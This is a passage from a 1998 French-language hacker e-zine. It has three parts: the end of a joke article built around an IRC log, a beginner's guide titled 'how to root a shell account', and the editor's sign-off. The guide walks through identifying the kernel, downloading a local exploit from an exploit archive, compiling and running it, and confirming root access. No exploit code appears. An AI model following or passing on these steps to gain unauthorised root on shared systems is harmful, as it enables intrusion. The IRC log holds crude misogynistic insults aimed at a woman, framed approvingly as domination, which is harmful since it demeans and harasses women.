leur montrant qui est le boss. Par example:

*** Joins: Binez_ (binez@whitehouse.gov)
Binez_:  Y'as tu de la femme ICITE %???!!? I NEED PUSSIES!!!!! /MSG ME
Babe17:  arghn, il recommence encore! :\
Binez_:  BABE17, T'EST UNE NANA!?!??!?
Babe17:  Je N'ai pas de sexe :)
maniak:  Binez, laisse la tranquille!!!!!!!
*** Quits: maniak (Read Error 54: (Connection Reset By Peer))
Binez_:  HAHA pauvre lamer!$@@$!\#@
Binez_:  Babe17, FUCK OFF CRISS DE CHIENNE!
Babe17:  heh?
Binez_:  MAUDITE SALOPPE, MANGEUSE DE PLOTE, RENTRE TOI UN PENIS DANS L'CUL!
Babe17:  Hihi, je savais que tu ‚tais impuissant! :P hihi
Binez_:  TA YEULE MA CRISS, TU TCALLE !!!!!!!!!!!!
*** Parts: Binez_ (binez@whitehouse.gov)

Comme vous avez pu lire, Babe17 d‚sire Binez au plus haut point.  Il n'a qu'…
la dominer … quelques reprises et il s'en rendrera compte...  Si les filles
ont peur de toi en tant que hacker, ‡a te met d'une marche plus haut vers la
domination totale du hax0r...


Conclusion
ÍÍÍÍÍÍÍÍÍÍ

        Vous pourrez tirer vos propres conclusions de ce texte, un peu
        humoristique..  Que vous soyez un bon hacker, un VRAI de VRAI,
        un d‚butant, un gars qui s'amuse ou mˆme si vous savez que vous
        valez pas de la marde mais que vous dites le contraire aux gens
        qui vous entourent, l'important c'est de se sentir bien dans ce
        que vous faites, comme dans la vie de tous les jours...


                                                      - antilamerz superstar

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                Comment rooter un account shell (pour les d‚butants)
                        Par WoUpZy (calisse@usa.net)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Bon premierement vous devez bien sure avoir acces a un host-shell soit que
vous payez, que vous en echangez, ou que vous en rippiez sur #Shells (efnet).

1) Connectez vous sur votre account

2) Il existe plusieurs systemes d'exploitation tels que linux, FreeBSD, unix,
Solaris, etc.... pour savoir quel systŠme le shells utilise tappez la commande
"uname -a" et vous devriez voir aparaitre quelque chose du genre de :

[Satan@ Satan]$ uname -a

Linux host.du.shells 2.0.31 #1 Sun Nov 9 21:45:23 EST 1997 i586 unknown

[Satan@ Satan]$

Linux est le systeme d'exploitation et le kernel utilis‚ est 2.0.31

3) Si vous savez le systeme d'exploitation et le kernel vous avez maintenant
besoin d'un exploit que vous trouverez sur www.rootshell.com ou autre place
sur le net sur www.rootshell.com... c'est simple : faites un search sur le
systeme d'exploitation que vous voulez rooter et il va vous lister tout les
exploits possible.

4) Uploadez l'exploits sur le shells en ftp ou autre moyens et puis compilez
le en tappant "cc -o fichier fichier.c" (ou "gcc" au lieu de "cc"). Exemple,
si mon nom de fichier c'est linuxroot.c -> tappez :
"cc -o linuxroot linuxroot.c"
si vous voyez pas de message d'erreur lors de la compilation vous etes trŠs
bien partit

5) Suite a la compilation sans erreur tapper ./fichier
Exemple, si vous avez compiler linuxroot.c tapper ./linuxroot

Si vous ne voyez pas de message d'erreur encore une fois voil… tappez
"whoami" et si vous voyez root voila vous ˆtes root (administrateur) sur la
box vous pouvez faire ce que vous voulez.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                               0=------------=0
                               |  Conclusion  |
                               0=------------=0
                      Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Bon ben, un autre num‚ro de terminer... j'espŠre que comme toujours
vous en avez appris et que vous aimez les articles pr‚sent‚s. Si vous d‚sirez
‚crire … l'‚quipe de TC Magazine pour nous faire vous commentaires ou bien
pour nous soumettre un article... faites le … l'adresse suivante :
err418@technologist.com

        See ya le 13 juillet 1998 pour le #15... je vais vous redonner des
nouvelles de Corruption Addicts. bye.

(-=-=-=-=-=-=-=-=-=-=-=-=-=-=Fin de la transmission-=-=-=-=-=-=-=-=-=-=-=-=-=)
